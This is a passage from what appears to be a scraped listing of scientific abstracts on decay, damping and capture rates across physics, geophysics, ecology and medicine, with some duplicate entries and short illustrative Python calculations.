by noteworthy decrease for larger particles takes place along with substantial red-shift of plasmon resonance frequencies as a function of particle size. We also introduced interface damping into our modeling, which substantially modifies the plasmon damping rates of smaller particles. We demonstrate unexpected reduction of the multipolar SP damping rates in certain size ranges. This effect can be explained by the suppression of the nonradiative decay channel as a result of the lost competition with the radiative channel. We show that experimental dipole damping rates [H. Baida, et al., Nano Lett. 9(10) (2009) 3463, and C. Sönnichsen, et al., Phys. Rev. Lett. 88 (2002) 077402], and the resulting resonance quality factors can be described in a consistent and straightforward way within our modeling extended to particle sizes still unavailable experimentally. 4. 
Joint Inversion of Gravity and Gravity Tensor Data Using the Structural Index as Weighting Function Rate Decay Ialongo, S.; Cella, F.; Fedi, M.; Florio, G. 2011-12-01 Most geophysical inversion problems are characterized by a number of data considerably higher than the number of the unknown parameters. This corresponds to solve highly underdetermined systems. To get a unique solution, a priori information must be therefore introduced. We here analyze the inversion of the gravity gradient tensor (GGT). Previous approaches to invert jointly or independently more gradient components are by Li (2001) proposing an algorithm using a depth weighting function and Zhdanov et alii (2004), providing a well focused inversion of gradient data. Both the methods give a much-improved solution compared with the minimum length solution, which is invariably shallow and not representative of the true source distribution. For very undetermined problems, this feature is due to the role of the depth weighting matrices used by both the methods. Recently, Cella and Fedi (2011) showed however that for magnetic and gravity data the depth weighting function has to be defined carefully, under a preliminary application of Euler Deconvolution or Depth from Extreme Point methods, yielding the appropriate structural index and then using it as the rate decay of the weighting function. We therefore propose to extend this last approach to invert jointly or independently the GGT tensor using the structural index as weighting function rate decay. In case of a joint inversion, gravity data can be added as well. This multicomponent case is also relevant because the simultaneous use of several components and gravity increase the number of data and reduce the algebraic ambiguity compared to the inversion of a single component. The reduction of such ambiguity was shown in Fedi et al, (2005) decisive to get an improved depth resolution in inverse problems, independently from any form of depth weighting function. The method is demonstrated to synthetic cases and applied to real cases, such as the Vredefort impact area (South Africa), characterized by a complex density 5. Nuclear mass inventory, photon dose rate and thermal decay heat of spent research reactor fuel assemblies SciTech Connect Pond, R.B.; Matos, J.E. 1996-05-01 As part of the Department of Energy`s spent nuclear fuel acceptance criteria, the mass of uranium and transuranic elements in spent research reactor fuel must be specified. These data are, however, not always known or readily determined. It is the purpose of this report to provide estimates of these data for some of the more common research reactor fuel assembly types. The specific types considered here are MTR, TRIGA and DIDO fuel assemblies. The degree of physical protection given to spent fuel assemblies is largely dependent upon the photon dose rate of the spent fuel material. These data also, are not always known or readily determined. Because of a self-protecting dose rate level of radiation (dose rate greater than 100 ren-x/h at I m in air), it is important to know the dose rate of spent fuel assemblies at all time. Estimates of the photon dose rate for spent MTR, TRIGA and DIDO-type fuel assemblies are given in this report. 6. Alpha-decay branching ratios of near-threshold states in 19Ne and the astrophysical rate of 15O(α,γ)19Ne Davids, B.; van den Berg, A. M.; Dendooven, P.; Fleurot, F.; Hunyadi, M.; de Huu, M. A.; Rehm, K. E.; Segel, R. E.; Siemssen, R. H.; Wilschut, H. W.; Wörtche, H. J.; Wuosmaa, A. 
H. 2003-05-01 The 15O(α, γ)19Ne reaction is one of two routes for breakout from the hot CNO cycles into the rp process in accreting neutron stars. Its astrophysical rate depends critically on the decay properties of excited states in 19Ne lying just above the 15O + α threshold. We have measured the α-decay branching ratios for these states using the p(21Ne,t)19Ne reaction at 43 MeV/u. 7. Periodic solutions of piecewise affine gene network models with non uniform decay rates: the case of a negative feedback loop. PubMed Farcot, Etienne; Gouzé, Jean-Luc 2009-12-01 This paper concerns periodic solutions of a class of equations that model gene regulatory networks. Unlike the vast majority of previous studies, it is not assumed that all decay rates are identical. To handle this more general situation, we rely on monotonicity properties of these systems. Under an alternative assumption, it is shown that a classical fixed point theorem for monotone, concave operators can be applied to these systems. The required assumption is expressed in geometrical terms as an alignment condition on so-called focal points. As an application, we show the existence and uniqueness of a stable periodic orbit for negative feedback loop systems in dimension 3 or more, and of a unique stable equilibrium point in dimension 2. This extends a theorem of Snoussi, which showed the existence of these orbits only. 8. Longitudinal T1 relaxation rate (R1) captures changes in short-term Mn exposure in welders. PubMed Lewis, Mechelle M; Flynn, Michael R; Lee, Eun-Young; Van Buren, Scott; Van Buren, Eric; Du, Guangwei; Fry, Rebecca C; Herring, Amy H; Kong, Lan; Mailman, Richard B; Huang, Xuemei 2016-12-01 We demonstrated recently that the T1 relaxation rate (R1) captured short-term Mn exposure in welders with chronic, relatively low exposure levels in a cross-sectional study. In the current study, we used a longitudinal design to examine whether R1 values reflect the short-term dynamics of Mn exposure. Twenty-nine welders were evaluated at baseline and 12 months. Occupational questionnaires estimated short-term welding exposure using welding hours in the 90days prior to each study visit (HrsW90). In addition, blood Mn levels, the pallidal index (PI; globus pallidus T1-weighted intensity (T1WI)/frontal white matter T1WI), and R1 values in brain regions of interest (ROIs) were determined as Mn biomarkers at each visit. Associations between changes in estimated welding exposure and changes in purported Mn biomarkers were assessed by Spearman's correlations with adjustment for age and baseline R1, HrsW90, and blood Mn values. Changes in welding hours (HrsW90: the short-term welding exposure estimate), was associated significantly with changes in R1 values in the putamen (r=0.541, p=0.005), caudate (R=0.453, p=0.023), globus pallidus (R=0.430, p=0.032), amygdala (R=0.461, p=0.020), and hippocampus (R=0.447, p=0.025), but not with changes in blood Mn levels or the PI. Changes in R1 values correlated with changes in the short-term welding exposure estimate, but not with more traditional measures of Mn exposure (blood Mn levels or PI). These results suggest that R1 may serve as a useful marker to capture the short-term dynamics in Mn brain accumulation related to welding exposure. Copyright © 2016 Elsevier B.V. All rights reserved. 9. The β-decay rates of 59Fe isotopes in shell burning environments and their influences on the production of 60Fe in massive star Li, K.; Lam, Y. H.; Qi, C.; Tang, X.; Zhang, N. 
2016-02-01 The experimental B(GT) strengths of the 59Fe excited states were employed to determine the transition strengths which greatly contribute 59Fe stellar β-decay at typical carbon shell burning temperature. The result has been compared with the theoretical rates FFN (Fuller-Fowler-Newman) and LMP (Langanke&Martinez-Pinedo). Impact of the newly determined rate on the synthesis of cosmic γ emitter 60Fe has also been studied using one-zone model calculation. Our results show 59Fe stellar β-decay rate plays an important role in the 60Fe nucleosynthesis. However the uncertainty of the decay rate is rather large due to the error of B(GT) strength that requires further studies. 10. Detection and decay rates of prey and prey symbionts in the gut of a predator through metagenomics. PubMed Paula, Débora P; Linard, Benjamin; Andow, David A; Sujii, Edison R; Pires, Carmen S S; Vogler, Alfried P 2015-07-01 DNA methods are useful to identify ingested prey items from the gut of predators, but reliable detection is hampered by low amounts of degraded DNA. PCR-based methods can retrieve minute amounts of starting material but suffer from amplification biases and cross-reactions with the predator and related species genomes. Here, we use PCR-free direct shotgun sequencing of total DNA isolated from the gut of the harlequin ladybird Harmonia axyridis at five time points after feeding on a single pea aphid Acyrthosiphon pisum. Sequence reads were matched to three reference databases: Insecta mitogenomes of 587 species, including H. axyridis sequenced here; A. pisum nuclear genome scaffolds; and scaffolds and complete genomes of 13 potential bacterial symbionts. Immediately after feeding, multicopy mtDNA of A. pisum was detected in tens of reads, while hundreds of matches to nuclear scaffolds were detected. Aphid nuclear DNA and mtDNA decayed at similar rates (0.281 and 0.11 h(-1) respectively), and the detectability periods were 32.7 and 23.1 h. Metagenomic sequencing also revealed thousands of reads of the obligate Buchnera aphidicola and facultative Regiella insecticola aphid symbionts, which showed exponential decay rates significantly faster than aphid DNA (0.694 and 0.80 h(-1) , respectively). However, the facultative aphid symbionts Hamiltonella defensa, Arsenophonus spp. and Serratia symbiotica showed an unexpected temporary increase in population size by 1-2 orders of magnitude in the predator guts before declining. Metagenomics is a powerful tool that can reveal complex relationships and the dynamics of interactions among predators, prey and their symbionts. © 2014 John Wiley & Sons Ltd. 11. Survival rate estimation in the presence of tag loss using joint analysis of capture-recapture and resighting data USGS Publications Warehouse Nichols, J.D.; Hines, J.E.; Lebreton, J.-D.; North, P.M. 1993-01-01 Studies using resightings of marked birds typically make use of readily-observable tags that are not retained as well as metal legbands. We review methods for estimating survival rate with open capture-recapture / resighting models when tag loss is not negligible. All methods rely on data from double-banding studies, usually carried out as part of the resighting study by application of metal legbands to all birds marked with alternative markers. When tag loss is homogeneous, the methods of Arnason and Mills (1981) and Pollock (1981) can be used. When rates of tag loss depend on time since marking, then a cohort approach can be used and is similar to the methods appropriate for homogeneous tag loss. 
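The metagenomics study above characterizes prey DNA in the predator gut by an exponential decay rate and a detectability period. A minimal sketch of how a decay constant maps to a detection window, using made-up read counts rather than the study's data and roughly the nuclear-DNA decay rate quoted above:

```python
import math

def detectability_period(initial_reads, detection_limit, decay_rate):
    """Time until an exponentially decaying signal drops below the detection
    limit: t = ln(N0 / limit) / k, with k in 1/h."""
    return math.log(initial_reads / detection_limit) / decay_rate

# Hypothetical: 5000 matching reads right after feeding, a detection limit
# of 5 reads, and a decay rate of ~0.28 per hour.
print(f"Detectable for ~{detectability_period(5000, 5, 0.28):.1f} h after ingestion")
```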
In addition, Kremers (1987) and Nichols et al. (1992) developed models for the joint analysis of recapture and resighting data in the presence of tag loss. We emphasize the importance of obtaining recapture data in observation-based studies in which tag loss is likely to be a problem. We discuss the allocation of effort to recaptures and resightings for such studies. 12. Results of experiments devoted to searches for 2K capture on {sup 78}Kr and for the double-beta decay of {sup 136}Xe with the aid of proportional counters SciTech Connect Gavrilyuk, Yu. M.; Gangapshev, A. M.; Zhantudueva, Dj. A.; Kazalov, V. V.; Kuz'minov, V. V.; Panasenko, S. I.; Ratkevich, S. S.; Efendiev, K. V.; Yakimenko, S. P. 2013-09-15 A brief description of two low-background setups deployed at the Baksan Neutrino Observatory (Institute for Nuclear Research, Russian Academy of Sciences) and intended for searches for two types of double-beta decay of inert-gas isotopes-2K capture on {sup 78}Kr and the double-beta decay of {sup 136}Xe-is given. The two setups in question have similar structures and employ identical large high-pressure copper proportional counters as detectors. Upon a treatment of data from measurements with krypton samples differing in the content of the isotope {sup 78}Kr, the spectrum for an enriched sample revealed an excess of events at a statistical-significance level of about two standard deviations (2{sigma}). If one attributes this excess to 2K(2{nu}) capture on {sup 78}Kr, the respective half-life is T{sub 1/2} = 1.4{sub -0.7}{sup +2.3} Multiplication-Sign 10{sup 22} yr at a 90% C.L. A treatment of data from measurements with xenon samples differing in content of the isotope {sup 136}Xe led to the appearance of an excess of events in the spectrum for an enriched sample at a statistical-significance level of about 2.2{sigma}. If one assumes that this excess is due to the two-neutrino double-beta decay of {sup 136}Xe, then the respective half-life is T{sub 1/2} = 5.8{sub -1.8}{sup +4.7} Multiplication-Sign 10{sup 21} yr. 13. Discriminating the Drivers of Edge Effects on Nest Predation: Forest Edges Reduce Capture Rates of Ship Rats (Rattus rattus), a Globally Invasive Nest Predator, by Altering Vegetation Structure PubMed Central Ruffell, Jay; Didham, Raphael K.; Barrett, Paul; Gorman, Nic; Pike, Rhonda; Hickey-Elliott, Andrée; Sievwright, Karin; Armstrong, Doug P. 2014-01-01 Forest edges can strongly affect avian nest success by altering nest predation rates, but this relationship is inconsistent and context dependent. There is a need for researchers to improve the predictability of edge effects on nest predation rates by examining the mechanisms driving their occurrence and variability. In this study, we examined how the capture rates of ship rats, an invasive nest predator responsible for avian declines globally, varied with distance from the forest edge within forest fragments in a pastoral landscape in New Zealand. We hypothesised that forest edges would affect capture rates by altering vegetation structure within fragments, and that the strength of edge effects would depend on whether fragments were grazed by livestock. We measured vegetation structure and rat capture rates at 488 locations ranging from 0–212 m from the forest edge in 15 forest fragments, seven of which were grazed. Contrary to the vast majority of previous studies of edge effects on nest predation, ship rat capture rates increased with increasing distance from the forest edge. 
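The tag-loss abstract above rests on a simple point: survival estimated from resightings of an auxiliary tag confounds true survival with tag retention, and recaptures of permanently banded birds let retention be estimated. A minimal sketch of the homogeneous-retention case only; the cited models are full likelihood treatments:

```python
def retention_estimate(recaptured_with_tag, recaptured_without_tag):
    """Per-period retention of the auxiliary (resighting) tag, estimated from
    physically recaptured birds identified by their permanent metal band."""
    return recaptured_with_tag / (recaptured_with_tag + recaptured_without_tag)

def true_survival(apparent_survival, retention):
    """Apparent survival from resightings confounds survival and retention:
    phi_apparent = phi_true * R  =>  phi_true = phi_apparent / R."""
    return apparent_survival / retention

# Hypothetical numbers: 85 of 100 recaptured metal-banded birds still carry
# the colour tag; apparent annual survival from resightings alone is 0.60.
r = retention_estimate(85, 15)
print(f"Estimated tag retention: {r:.2f}")
print(f"Tag-loss-corrected survival: {true_survival(0.60, r):.2f}")
```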
For grazed fragments, capture rates were estimated to be 78% lower at the forest edge than 118 m into the forest interior (the farthest distance for grazed fragments). This relationship was similar for ungrazed fragments, with capture rates estimated to be 51% lower at the forest edge than 118 m into the forest interior. A subsequent path analysis suggested that these ‘reverse’ edge effects were largely or entirely mediated by changes in vegetation structure, implying that edge effects on ship rats can be predicted from the response of vegetation structure to forest edges. We suggest the occurrence, strength, and direction of edge effects on nest predation rates may depend on edge-driven changes in local habitat when the dominant predator is primarily restricted to forest patches. PMID:25412340 14. Discriminating the drivers of edge effects on nest predation: forest edges reduce capture rates of ship rats (Rattus rattus), a globally invasive nest predator, by altering vegetation structure. PubMed Ruffell, Jay; Didham, Raphael K; Barrett, Paul; Gorman, Nic; Pike, Rhonda; Hickey-Elliott, Andrée; Sievwright, Karin; Armstrong, Doug P 2014-01-01 Forest edges can strongly affect avian nest success by altering nest predation rates, but this relationship is inconsistent and context dependent. There is a need for researchers to improve the predictability of edge effects on nest predation rates by examining the mechanisms driving their occurrence and variability. In this study, we examined how the capture rates of ship rats, an invasive nest predator responsible for avian declines globally, varied with distance from the forest edge within forest fragments in a pastoral landscape in New Zealand. We hypothesised that forest edges would affect capture rates by altering vegetation structure within fragments, and that the strength of edge effects would depend on whether fragments were grazed by livestock. We measured vegetation structure and rat capture rates at 488 locations ranging from 0-212 m from the forest edge in 15 forest fragments, seven of which were grazed. Contrary to the vast majority of previous studies of edge effects on nest predation, ship rat capture rates increased with increasing distance from the forest edge. For grazed fragments, capture rates were estimated to be 78% lower at the forest edge than 118 m into the forest interior (the farthest distance for grazed fragments). This relationship was similar for ungrazed fragments, with capture rates estimated to be 51% lower at the forest edge than 118 m into the forest interior. A subsequent path analysis suggested that these 'reverse' edge effects were largely or entirely mediated by changes in vegetation structure, implying that edge effects on ship rats can be predicted from the response of vegetation structure to forest edges. We suggest the occurrence, strength, and direction of edge effects on nest predation rates may depend on edge-driven changes in local habitat when the dominant predator is primarily restricted to forest patches. 15. Elevated tropospheric CO2 and O3 may not alter initial wood decomposition rate or wood-decaying fungal community composition of Northern hardwoods Treesearch Emmanuel Ebanyenle; Andrew J. Burton; Andrew J. Storer; Dana L. Richter; Jessie A. Glaeser 2016-01-01 We examined the effects of elevated CO2 and/or O3 on the wood-decaying basidiomycete fungal community and wood decomposition rates at the Aspen Free-Air CO2 and O3 Enrichment (Aspen FACE) project. 
Mass loss rates were determined after one year of log decomposition on the soil... 16. The effects of ultra-strong magnetic fields on electron capture rates for iron group nuclei in the outer crust of magnetars Du, Jun; Luo, Zhi-Quan; Zhang, Jie 2014-06-01 Based on the work of Wang et al. (Chin. Phys. Lett. 29:049701, 2012), we re-investigated electron capture on iron group nuclei in the outer crust of magnetars and studied magnetar evolution. Effects of ultra-strong magnetic fields on electron capture rates for 57Co have been analyzed in the nuclear shell model and under the Landau-level-quantization approximation, and the electron capture rates and the neutrino energy loss rates on iron group nuclei in the outer crust of magnetars have been calculated. The results show that electron capture rates on 57Co increase greatly in the ultra-strong magnetic field, generally by more than 3 orders of magnitude, and that the neutrino energy loss rates due to electron capture on iron group nuclei increase by more than 3 orders of magnitude in the range from B=4.414×10^13 G to B=4.414×10^15 G. These conclusions will play an important role in future studies of magnetar evolution. Furthermore, we modify the expressions of the electron chemical potential (Fermi energy) and phase space factor by introducing a Dirac δ-function, and select appropriate parameters of temperature T, magnetic field B, and matter density ρ in the outer crust; our results should therefore be more reliable than those of Wang et al. 17. The integrated statistical rate function for superallowed Fermi β-decays Szybisz, Leszek 1984-09-01 The impact that recently pointed-out differences between the two sets of integrated statistical rate functions, i.e., f-values, calculated according to the widely adopted methods of Behrens, Jänecke and Bühring and Towner and Hardy have on the internal consistency of Ft-values of the eight best measured superallowed Fermi β-transitions is analyzed. We find that, due to the dramatic improvement in the accuracy of experimental data, both sets of Ft-values show a statistical difference. In addition, we evaluate the second-forbidden corrections using an alternative way proposed by Jaus. This latter prescription yields results in good agreement with those obtained using the procedure of Behrens, Jänecke and Bühring. The author thanks Dr. H. Behrens for enlightening discussions. 18. Decay Rates to Equilibrium for Nonlinear Plate Equations with Degenerate, Geometrically-Constrained Damping SciTech Connect Geredeli, Pelin G.; Webster, Justin T. 2013-12-15 We analyze the convergence to equilibrium of solutions to the nonlinear Berger plate evolution equation in the presence of localized interior damping (also referred to as geometrically constrained damping). Utilizing the results in (Geredeli et al. in J. Differ. Equ. 254:1193–1229, 2013), we have that any trajectory converges to the set of stationary points N. Employing standard assumptions from the theory of nonlinear unstable dynamics on the set N, we obtain the rate of convergence to an equilibrium. The critical issue in the proof of convergence to equilibria is a unique continuation property (which we prove for the Berger evolution) that provides a gradient structure for the dynamics. We also consider the more involved von Karman evolution, and show that the same results hold assuming a unique continuation property for solutions, which is presently a challenging open problem. 19.
Time since death and decay rate constants of Norway spruce and European larch deadwood in subalpine forests determined using dendrochronology and radiocarbon dating Petrillo, M.; Cherubini, P.; Fravolini, G.; Ascher, J.; Schärer, M.; Synal, H.-A.; Bertoldi, D.; Camin, F.; Larcher, R.; Egli, M. 2015-09-01 Due to the large size and highly heterogeneous spatial distribution of deadwood, the time scales involved in the coarse woody debris (CWD) decay of Picea abies (L.) Karst. and Larix decidua Mill. in Alpine forests have been poorly investigated and are largely unknown. We investigated the CWD decay dynamics in an Alpine valley in Italy using the five-decay class system commonly employed for forest surveys, based on a macromorphological and visual assessment. For the decay classes 1 to 3, most of the dendrochronological samples were cross-dated to assess the time that had elapsed since tree death, but for decay classes 4 and 5 (poorly preserved tree rings) and some others not having enough tree rings, radiocarbon dating was used. In addition, density, cellulose and lignin data were measured for the dated CWD. The decay rate constants for spruce and larch were estimated on the basis of the density loss using a single negative exponential model. In the decay classes 1 to 3, the ages of the CWD were similar, varying between 1 and 54 years for spruce and 3 and 40 years for larch, with no significant differences between the classes; classes 1-3 are therefore not indicative of deadwood age. We found, however, distinct tree species-specific differences in decay classes 4 and 5, with larch CWD reaching an average age of 210 years in class 5 and spruce only 77 years. The mean CWD rate constants were 0.012 to 0.018 yr-1 for spruce and 0.005 to 0.012 yr-1 for larch. Cellulose and lignin time trends and half-lives (using a multiple-exponential model) could be derived on the basis of the ages of the CWD. The half-lives for cellulose were 21 yr for spruce and 50 yr for larch. The half-life of lignin is considerably higher and may be more than 100 years in larch CWD. 20. Wobbly strings: calculating the capture rate of a webcam using the rolling shutter effect in a guitar Cunnah, David 2014-07-01 In this paper I propose a method of calculating the time between line captures in a standard complementary metal-oxide-semiconductor (CMOS) webcam using the rolling shutter effect when filming a guitar. The exercise links the concepts of wavelength and frequency, while outlining the basic operation of a CMOS camera through vertical line capture. 1. Wobbly Strings: Calculating the Capture Rate of a Webcam Using the Rolling Shutter Effect in a Guitar ERIC Educational Resources Information Center Cunnah, David 2014-01-01 In this paper I propose a method of calculating the time between line captures in a standard complementary metal-oxide-semiconductor (CMOS) webcam using the rolling shutter effect when filming a guitar. The exercise links the concepts of wavelength and frequency, while outlining the basic operation of a CMOS camera through vertical line capture. 2. Wobbly Strings: Calculating the Capture Rate of a Webcam Using the Rolling Shutter Effect in a Guitar ERIC Educational Resources Information Center Cunnah, David 2014-01-01 In this paper I propose a method of calculating the time between line captures in a standard complementary metal-oxide-semiconductor (CMOS) webcam using the rolling shutter effect when filming a guitar.
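A back-of-the-envelope sketch of the rolling-shutter calculation described in these abstracts: a vibrating string appears as a spatial wave because successive image rows are captured at successive times, so one apparent wave period spanning N rows corresponds to one string period. The numbers below are hypothetical, not values from the paper:

```python
# Rolling-shutter sketch: time per line capture from the apparent "wobble" of a string.
# All numeric values are assumed for illustration.

string_freq_hz = 110.0      # pitch of the string, assumed known (e.g., open A string)
rows_per_period = 60        # image rows spanned by one apparent wave of the string
total_rows = 480            # vertical resolution of the webcam frame

# One apparent spatial period corresponds to one temporal period of the string,
# so rows_per_period * row_time = 1 / string_freq_hz.
row_time = 1.0 / (string_freq_hz * rows_per_period)   # time between successive line captures
frame_scan_time = row_time * total_rows               # time to scan a whole frame

print(f"time per line capture ~ {row_time*1e6:.1f} microseconds")
print(f"time to scan one frame ~ {frame_scan_time*1e3:.1f} ms")
```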
The exercise links the concepts of wavelength and frequency, while outlining the basic operation of a CMOS camera through vertical line capture. 3. Intravoxel distribution of DWI decay rates reveals C6 glioma invasion in rat brain. PubMed Bennett, Kevin M; Hyde, James S; Rand, Scott D; Bennett, Raoqiong; Krouwer, Hendrikus G J; Rebro, Kelly J; Schmainda, Kathleen M 2004-11-01 The hypothesis was tested that the intravoxel distribution of water diffusion rates, as measured with a stretched-exponential model of diffusion-weighted imaging (DWI), is a marker of brain tumor invasion. Eight rats underwent intracerebral inoculation of C6 glioma cells. In three rats, cells were labeled with a fluorescent dye for microscopy. One rat was inoculated with a saline solution, and five more rats were imaged without inoculation as controls. Five healthy uninoculated rats were also imaged. DWI was performed 14-15 days after inoculation, with diffusion-weighting factor b = 500 to 6500 sec/mm2, and the resulting signal attenuation was fitted with the stretched-exponential model. The heterogeneity index values were significantly lower (P < 0.05) in the peritumor ROI than in normal gray matter and significantly higher than in normal white matter. The distributed diffusion coefficient values were significantly lower than in normal white matter or normal gray matter. Fluorescence microscopy confirmed the presence of tumors in the peritumor region that could be histologically distinguished from the main tumor mass. There was no change in proton density or T2-weighted images in the peritumor region, making vasogenic edema unlikely as a source of contrast. It is therefore thought that the heterogeneity parameter alpha is a marker of brain tumor invasion. (c) 2004 Wiley-Liss, Inc. 4. Collision rates for rare cell capture in periodic obstacle arrays strongly depend on density of cell suspension. PubMed Cimrák, I 2016-11-01 Recently, computational modelling has been successfully used for determination of collision rates for rare cell capture in periodic obstacle arrays. The models were based on particle advection simulations where the cells were advected according to velocity field computed from two dimensional Navier-Stokes equations. This approach may be used under the assumption of very dilute cell suspensions where no mutual cell collisions occur. We use the object-in-fluid framework to demonstrate that even with low cell-to-fluid ratio, the optimal geometry of the obstacle array significantly changes. We show computational simulations for ratios of 3.5, 6.9 and 10.4% determining the optimal geometry of the periodic obstacle arrays. It was already previously demonstrated that cells in periodic obstacle arrays follow trajectories in two modes: the colliding mode and the zig-zag mode. The colliding mode maximizes the cell-obstacle collision frequency. Our simulations reveal that for dilute suspensions and for suspensions with cell-to-fluid ratio 3.5%, there is a range of column shifts for which the cells follow colliding trajectories. However we showed, that for 6.9 and 10.4%, the cells never follow colliding trajectories. 5. An alternative marker for the effectiveness of water fluoridation: hospital extraction rates for dental decay, a two-region study. PubMed Elmer, T B; Langford, J W; Morris, A J 2014-03-01 Contemporary evidence for the effectiveness of water fluoridation schemes in the U.K. is sparse. The utility of routinely collected data in providing evidence warrants further research. 
To examine inpatient hospital episodes statistics for dental extractions as an alternative population marker for the effectiveness of water fluoridation by comparing hospital admissions between two major strategic health authority (SHA) areas, the West Midlands SHA-largely fluoridated--and the North West SHA--largely unfluoridated. Hospital episodes statistics (HES) were interrogated to provide data on admissions for simple and surgical dental extractions, which had a primary diagnostic code of either dental caries or diseases of pulp and periapical tissues for financial years 2006/7, 2007/8 and 2008/9. Data was aggregated by SHA area and quinary age group. Directly standardised rates (DSR) of admissions purchased for each primary care trust (PCT) were calculated and ranked by index of multiple deprivation (IMD). A significant difference in DSRs of admission between PCTs in the West Midlands and North West was observed (Mann-Whitney U test [p <0.0001]) irrespective of IMD ranking. The difference in rates between the two most deprived PCTs was 27-fold. After ranking by IMD, DSRs of hospital admissions for the extraction of decayed or pulpally/periapically involved teeth is lower in areas with a fluoridated water supply. The analysis of routinely collected HES data may help identify the impact of water fluoridation schemes. 6. β -decay rate of 59Fe in shell burning environment and its influence on the production of 60Fe in a massive star Li, K. A.; Lam, Y. H.; Qi, C.; Tang, X. D.; Zhang, N. T. 2016-12-01 We deduced the stellar β -decay rate of 59Fe at typical carbon-shell burning temperature by taking the experimental Gamow-Teller transition strengths of the 59Fe excited states. The result is also compared with those derived from large-scale shell model calculations. The new rate is up to a factor of 2.5 lower than the theoretical rate of Fuller, Fowler, and Newman (FFN) and up to a factor of 5 higher than decay rate of Langanke and Martínez-Pinedo (LMP) in the temperature region 0.5 ≤T ≤2 GK. We estimated the impact of the newly determined rate on the synthesis of cosmic γ emitter 60Fe in C-shell burning and explosive C/Ne burning using a one-zone model calculation. Our results show that 59Fe stellar β decay plays an important role in 60Fe nucleosynthesis, even though the uncertainty of the decay rate is rather large due to the error of B (GT) strengths. 7. Trophic position and metabolic rate predict the long-term decay process of radioactive cesium in fish: a meta-analysis. PubMed Doi, Hideyuki; Takahara, Teruhiko; Tanaka, Kazuya 2012-01-01 Understanding the long-term behavior of radionuclides in organisms is important for estimating possible associated risks to human beings and ecosystems. As radioactive cesium (¹³⁷Cs) can be accumulated in organisms and has a long physical half-life, it is very important to understand its long-term decay in organisms; however, the underlying mechanisms determining the decay process are little known. We performed a meta-analysis to collect published data on the long-term ¹³⁷Cs decay process in fish species to estimate biological (metabolic rate) and ecological (trophic position, habitat, and diet type) influences on this process. From the linear mixed models, we found that 1) trophic position could predict the day of maximum ¹³⁷Cs activity concentration in fish; and 2) the metabolic rate of the fish species and environmental water temperature could predict ecological half-lives and decay rates for fish species. 
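For reference, the standard conversions behind these quantities can be sketched as follows: an ecological half-life obtained from a first-order decay rate, and an effective half-life that combines ecological loss with the physical half-life of 137Cs. The rate constant used here is hypothetical, not a value from the meta-analysis:

```python
import math

# Illustrative half-life conversions for 137Cs in fish; the ecological decay
# rate below is a placeholder, not an estimate from the study.

k_eco_per_day = 0.004                        # hypothetical ecological decay rate (1/day)
T_eco = math.log(2) / k_eco_per_day          # ecological half-life (days)

T_phys = 30.17 * 365.25                      # physical half-life of 137Cs (~30.17 y), in days
T_eff = 1.0 / (1.0 / T_phys + 1.0 / T_eco)   # effective half-life combines both loss terms

print(f"ecological half-life ~ {T_eco:.0f} d, effective half-life ~ {T_eff:.0f} d")
```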
These findings revealed that ecological and biological traits are important to predict the long-term decay process of ¹³⁷Cs activity concentration in fish. 8. Trophic Position and Metabolic Rate Predict the Long-Term Decay Process of Radioactive Cesium in Fish: A Meta-Analysis PubMed Central Doi, Hideyuki; Takahara, Teruhiko; Tanaka, Kazuya 2012-01-01 Understanding the long-term behavior of radionuclides in organisms is important for estimating possible associated risks to human beings and ecosystems. As radioactive cesium (137Cs) can be accumulated in organisms and has a long physical half-life, it is very important to understand its long-term decay in organisms; however, the underlying mechanisms determining the decay process are little known. We performed a meta-analysis to collect published data on the long-term 137Cs decay process in fish species to estimate biological (metabolic rate) and ecological (trophic position, habitat, and diet type) influences on this process. From the linear mixed models, we found that 1) trophic position could predict the day of maximum 137Cs activity concentration in fish; and 2) the metabolic rate of the fish species and environmental water temperature could predict ecological half-lives and decay rates for fish species. These findings revealed that ecological and biological traits are important to predict the long-term decay process of 137Cs activity concentration in fish. PMID:22279534 9. Time since death and decay rate constants of Norway spruce and European larch deadwood in subalpine forests determined using dendrochronology and radiocarbon dating Petrillo, Marta; Cherubini, Paolo; Fravolini, Giulia; Marchetti, Marco; Ascher-Jenull, Judith; Schärer, Michael; Synal, Hans-Arno; Bertoldi, Daniela; Camin, Federica; Larcher, Roberto; Egli, Markus 2016-03-01 Due to the large size (e.g. sections of tree trunks) and highly heterogeneous spatial distribution of deadwood, the timescales involved in the coarse woody debris (CWD) decay of Picea abies (L.) Karst. and Larix decidua Mill. in Alpine forests are largely unknown. We investigated the CWD decay dynamics in an Alpine valley in Italy using the chronosequence approach and the five-decay class system that is based on a macromorphological assessment. For the decay classes 1-3, most of the dendrochronological samples were cross-dated to assess the time that had elapsed since tree death, but for decay classes 4 and 5 (poorly preserved tree rings) radiocarbon dating was used. In addition, density, cellulose, and lignin data were measured for the dated CWD. The decay rate constants for spruce and larch were estimated on the basis of the density loss using a single negative exponential model, a regression approach, and the stage-based matrix model. In the decay classes 1-3, the ages of the CWD were similar and varied between 1 and 54 years for spruce and 3 and 40 years for larch, with no significant differences between the classes; classes 1-3 are therefore not indicative of deadwood age. This seems to be due to a time lag between the death of a standing tree and its contact with the soil. We found distinct tree-species-specific differences in decay classes 4 and 5, with larch CWD reaching an average age of 210 years in class 5 and spruce only 77 years. The mean CWD rate constants were estimated to be in the range 0.018 to 0.022 y-1 for spruce and to about 0.012 y-1 for larch. Snapshot sampling (chronosequences) may overestimate the age and mean residence time of CWD. 
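A minimal sketch of the single-negative-exponential density-loss model used in these deadwood studies, fitted by log-linear least squares; the (age, relative density) pairs are synthetic, not the published measurements:

```python
import numpy as np

# Single negative exponential decay model for CWD density loss:
# density(t) = density_0 * exp(-k * t). Data below are synthetic.

ages = np.array([5.0, 15.0, 30.0, 60.0, 120.0, 210.0])          # years since tree death
rel_density = np.array([0.95, 0.85, 0.70, 0.48, 0.25, 0.09])    # fraction of initial density

# Log-linear least squares: ln(density) = ln(density_0) - k * t
slope, intercept = np.polyfit(ages, np.log(rel_density), 1)
k = -slope

print(f"decay rate constant k ~ {k:.3f} 1/yr")
print(f"half-life ~ {np.log(2)/k:.0f} yr, mean residence time ~ {1/k:.0f} yr")
```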
